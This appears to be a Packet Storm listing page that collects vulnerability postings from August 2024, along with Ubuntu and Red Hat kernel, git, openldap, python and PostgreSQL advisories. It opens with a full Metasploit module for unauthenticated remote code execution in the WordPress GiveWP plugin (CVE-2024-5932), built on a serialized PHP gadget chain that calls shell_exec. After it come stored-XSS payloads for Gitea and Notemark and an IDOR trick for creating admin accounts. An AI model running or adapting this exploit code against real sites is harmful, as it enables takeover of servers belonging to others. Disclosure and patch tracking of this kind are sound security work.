The GiveWP Donation plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP object injection (POI) flaw granting an unauthenticated attacker arbitrary code execution.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Wordpress  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GiveWP Unauthenticated Donation Process Exploit',        'Description' => %q{          The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution.        },        'License' => MSF_LICENSE,        'Author' => [          'Villu Orav',         # Initial Discovery          'EQSTSeminar',        # Proof of Concept          'Julien Ahrens',      # Vulnerability Analysis          'Valentin Lobstein'   # Metasploit Module        ],        'References' => [          ['CVE', '2024-5932'],          ['URL', 'https://github.com/EQSTSeminar/CVE-2024-5932'],          ['URL', 'https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932'],          ['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin']        ],        'DisclosureDate' => '2024-08-25',        'Platform' => %w[unix linux win],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Unix/Linux Command Shell',            {              'Platform' => %w[unix linux],              'Arch' => ARCH_CMD              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp            }          ],          [            'Windows Command Shell',            {              'Platform' => 'win',              'Arch' => ARCH_CMD              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp            }          ]        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )      )  end  def check    return CheckCode::Unknown unless wordpress_and_online?    print_status("WordPress Version: #{wordpress_version}") if wordpress_version    check_code = check_plugin_version_from_readme('give', '3.14.2')    return CheckCode::Safe unless check_code.code == 'appears'    print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}")    CheckCode::Appears  end  def exploit    forms = fetch_form_list    fail_with(Failure::UnexpectedReply, 'No forms found.') if forms.empty?    selected_form = forms.sample    valid_form = retrieve_and_analyze_form(selected_form['id'])    return print_error('Failed to retrieve a valid form for exploitation.') unless valid_form    print_status("Using Form ID: #{valid_form['give_form_id']} for exploitation.")    send_exploit_request(      valid_form['give_form_id'],      valid_form['give_form_hash'],      valid_form['give_price_id'],      valid_form['give_amount']    )  end  def fetch_form_list    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'data' => 'action=give_form_search'    )    return print_error('Failed to retrieve form list.') unless res&.code == 200    forms = JSON.parse(res.body)    form_ids = forms.map { |form| form['id'] }.sort    print_good("Successfully retrieved form list. Available Form IDs: #{form_ids.join(', ')}")    forms  end  def retrieve_and_analyze_form(form_id)    form_res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'vars_post' => { 'action' => 'give_donation_form_nonce', 'give_form_id' => form_id }    )    return unless form_res&.code == 200    form_data = JSON.parse(form_res.body)    give_form_id = form_id    give_form_hash = form_data['data']    give_price_id = '0'    give_amount = '$10.00'    # Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work.    return unless give_form_hash    {      'give_form_id' => give_form_id,      'give_form_hash' => give_form_hash,      'give_price_id' => give_price_id,      'give_amount' => give_amount    }  end  def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount)    final_payload = format(      'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \      'O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{' \      's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";' \      'O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";' \      's:10:"shell_exec";s:12:"\\0*\\0generator";' \      'O:34:"Give\\\\\\\\Onboarding\\\\\\\\SettingsRepository":1:{' \      's:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%<length>d:"%<encoded>s";}}' \      's:13:"\\0*\\0maxRetries";i:10;}}}}}}',      length: payload.encoded.length,      encoded: payload.encoded    )    data = {      'give-form-id' => give_form_id,      'give-form-hash' => give_form_hash,      'give-price-id' => give_price_id,      'give-amount' => give_amount,      'give_first' => Faker::Name.first_name,      'give_last' => Faker::Name.last_name,      'give_email' => Faker::Internet.email,      'give_title' => final_payload,      'give-gateway' => 'offline',      'action' => 'give_process_donation'    }    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'data' => URI.encode_www_form(data)    }, 0)  endend

WordPress GiveWP Donation / Fundraising Platform 3.14.1 Code Execution

Gitea version 1.22.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Stored XSS in Gitea# Date: 27/08/2024# Exploit Authors: Catalin Iovita & Alexandru Postolache# Vendor Homepage: (https://github.com/go-gitea/gitea)# Version: 1.22.0# Tested on: Linux 5.15.0-107, Go 1.23.0# CVE: CVE-2024-6886## Vulnerability DescriptionGitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.## Steps to Reproduce1. Log in to the application.2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint.3. In the Description field, input the following payload:    <a href=javascript:alert()>XSS test</a>4. Save the changes.5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.

Gitea 1.22.0 Cross Site Scripting

Notemark versions 0.13.0 and below suffer from a cross site scripting vulnerability.

    # Exploit Title: Stored XSS in NoteMark# Date: 07/29/2024# Exploit Author: Alessio Romano (sfoffo)# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/# Version: 0.13.0 and below# Tested on: Linux# References:https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3# CVE: CVE-2024-41819## Steps to Reproduce1. Log in to the application.2. Create a new note or enter a previously created note.3. Access the note editor functionality from the selected note by clickingon the "Editor" tab.4. Input the following payload:[xss-link](javascript:alert(1))5. Save the changes.6. Click on the "Rendered" tab to view the rendered markdown version of thenote. Click on the previously created link to pop the injected alert.## HTTP Request PoCPUT /api/notes/<note-uuid>/content HTTP/1.1Host: localhost:8000Accept: */*Content-Type: text/plain;charset=UTF-8Content-Length: 34Sec-Fetch-Site: same-originAuthorization: Bearer <TOKEN>[xss-link](javascript:alert(1))

Notemark 0.13.0 Cross Site Scripting

Ubuntu Security Notice 6972-4 - Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the Linux Kernel contained a race condition, leading to a NULL pointer dereference. An attacker could possibly use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem in the Linux kernel, leading to a null pointer dereference vulnerability. A privileged local attacker could use this to possibly cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6972-4August 28, 2024linux-oracle vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-oracle: Linux kernel for Oracle Cloud systemsDetails:Yuxuan Hu discovered that the Bluetooth RFCOMM protocol driver in the LinuxKernel contained a race condition, leading to a NULL pointer dereference.An attacker could possibly use this to cause a denial of service (systemcrash). (CVE-2024-22099)It was discovered that a race condition existed in the Bluetooth subsystemin the Linux kernel, leading to a null pointer dereference vulnerability. Aprivileged local attacker could use this to possibly cause a denial ofservice (system crash). (CVE-2024-24860)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - SuperH RISC architecture;   - User-Mode Linux (UML);   - GPU drivers;   - MMC subsystem;   - Network drivers;   - PHY drivers;   - Pin controllers subsystem;   - Xen hypervisor drivers;   - GFS2 file system;   - Core kernel;   - Bluetooth subsystem;   - IPv4 networking;   - IPv6 networking;   - HD-audio driver;   - ALSA SH drivers;(CVE-2024-26903, CVE-2024-35835, CVE-2023-52644, CVE-2024-39292,CVE-2024-36940, CVE-2024-26600, CVE-2023-52629, CVE-2024-35955,CVE-2023-52760, CVE-2023-52806, CVE-2024-39484, CVE-2024-26679,CVE-2024-26654, CVE-2024-36901, CVE-2024-26687, CVE-2023-52470)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-4.15.0-1134-oracle  4.15.0-1134.145                                   Available with Ubuntu Pro   linux-image-oracle-lts-18.04    4.15.0.1134.139                                   Available with Ubuntu ProUbuntu 16.04 LTS   linux-image-4.15.0-1134-oracle  4.15.0-1134.145~16.04.1                                   Available with Ubuntu Pro   linux-image-oracle              4.15.0.1134.145~16.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6972-4   https://ubuntu.com/security/notices/USN-6972-3   https://ubuntu.com/security/notices/USN-6972-2   https://ubuntu.com/security/notices/USN-6972-1   CVE-2023-52470, CVE-2023-52629, CVE-2023-52644, CVE-2023-52760,   CVE-2023-52806, CVE-2024-22099, CVE-2024-24860, CVE-2024-26600,   CVE-2024-26654, CVE-2024-26679, CVE-2024-26687, CVE-2024-26903,   CVE-2024-35835, CVE-2024-35955, CVE-2024-36901, CVE-2024-36940,   CVE-2024-39292, CVE-2024-39484

Ubuntu Security Notice USN-6972-4

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

Posted Aug 29, 2024

Authored by indoushka

Online Graduate Tracer System version 1.0.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 0abd7e5d887d9e2204c565886d418ad0656b2616bb80e508761e6e23aa8bf66f

Download | Favorite | View

**Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : Online Graduate Tracer System V 1.0.0 IDOR Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new admin.[+] use payload : /admin/user_ad.php or /admin/homead.php[+] http://127.0.0.1/tracking/admin/user_ad.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,590)
*   Arbitrary (16,908)
*   BBS (2,859)
*   Bypass (1,880)
*   CGI (1,034)
*   Code Execution (7,844)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,413)
*   DoS (25,127)
*   Encryption (2,389)
*   Exploit (53,324)
*   File Inclusion (4,266)
*   File Upload (1,001)
*   Firewall (822)
*   Info Disclosure (2,893)
*   Intrusion Detection (916)
*   Java (3,144)
*   JavaScript (899)
*   Kernel (7,244)
*   Local (14,809)
*   Magazine (587)
*   Overflow (13,180)
*   Perl (1,435)
*   PHP (5,228)
*   Proof of Concept (2,397)
*   Protocol (3,733)
*   Python (1,649)
*   Remote (31,707)
*   Root (3,639)
*   Rootkit (529)
*   Ruby (632)
*   Scanner (1,657)
*   Security Tool (8,033)
*   Shell (3,282)
*   Shellcode (1,217)
*   Sniffer (903)
*   Spoof (2,279)
*   SQL Injection (16,630)
*   TCP (2,444)
*   Trojan (690)
*   UDP (904)
*   Virus (670)
*   Vulnerability (33,027)
*   Web (9,974)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,270)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,110)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,941)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,657)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,783)
*   UNIX (9,443)
*   UnixWare (187)
*   Windows (6,679)
*   Other

Online Graduate Tracer System 1.0.0 Insecure Direct Object Reference

Red Hat Security Advisory 2024-6033-03 - An update for openldap is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a null pointer vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6033.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: openldap security updateAdvisory ID:        RHSA-2024:6033-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6033Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2023-2953====================================================================Summary: An update for openldap is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:OpenLDAP is an open-source suite of Lightweight Directory Access Protocol (LDAP) applications and development tools. LDAP is a set of protocols used to access and maintain distributed directory information services over an IP network. Security Fix(es):* openldap: null pointer dereference in  ber_memalloc_x  function (CVE-2023-2953)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-2953References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2210651

Red Hat Security Advisory 2024-6033-03

Red Hat Security Advisory 2024-6030-03 - An update for python3 is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6030.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Low: python3 security updateAdvisory ID:        RHSA-2024:6030-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6030Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-4032====================================================================Summary: An update for python3 is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Low. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.Security Fix(es):* python: incorrect IPv4 and IPv6 private ranges (CVE-2024-4032)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4032References:https://access.redhat.com/security/updates/classification/#lowhttps://bugzilla.redhat.com/show_bug.cgi?id=2292921

Red Hat Security Advisory 2024-6030-03

Red Hat Security Advisory 2024-6028-03 - An update for git is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6028.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git security updateAdvisory ID:        RHSA-2024:6028-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6028Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-32002====================================================================Summary: An update for git is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.Security Fix(es):* git: Recursive clones RCE (CVE-2024-32002)* git: RCE while cloning local repos (CVE-2024-32004)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32002References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2280421https://bugzilla.redhat.com/show_bug.cgi?id=2280428

Red Hat Security Advisory 2024-6028-03

Red Hat Security Advisory 2024-6027-03 - An update for git is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6027.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git security updateAdvisory ID:        RHSA-2024:6027-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6027Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-32002====================================================================Summary: An update for git is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.Security Fix(es):* git: Recursive clones RCE (CVE-2024-32002)* git: RCE while cloning local repos (CVE-2024-32004)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32002References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2280421https://bugzilla.redhat.com/show_bug.cgi?id=2280428

Red Hat Security Advisory 2024-6027-03

Red Hat Security Advisory 2024-6020-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6020.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:15 security updateAdvisory ID:        RHSA-2024:6020-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6020Issue date:         2024-08-29Revision:           03CVE Names:          CVE-2024-4317====================================================================Summary: An update for the postgresql:15 module is now available for Red Hat EnterpriseLinux 9.Red Hat Product Security has rated this update as having a security impact ofImportant. A Common Vulnerability Scoring System (CVSS) base score, which givesa detailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: PostgreSQL relation replacement during pg_dump executes arbitrary SQL (CVE-2024-7348)* postgresql: PostgreSQL pg_stats_ext and pg_stats_ext_exprs lack authorization checks (CVE-2024-4317)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVE page(s)listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-4317References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2279935

Tag

#linux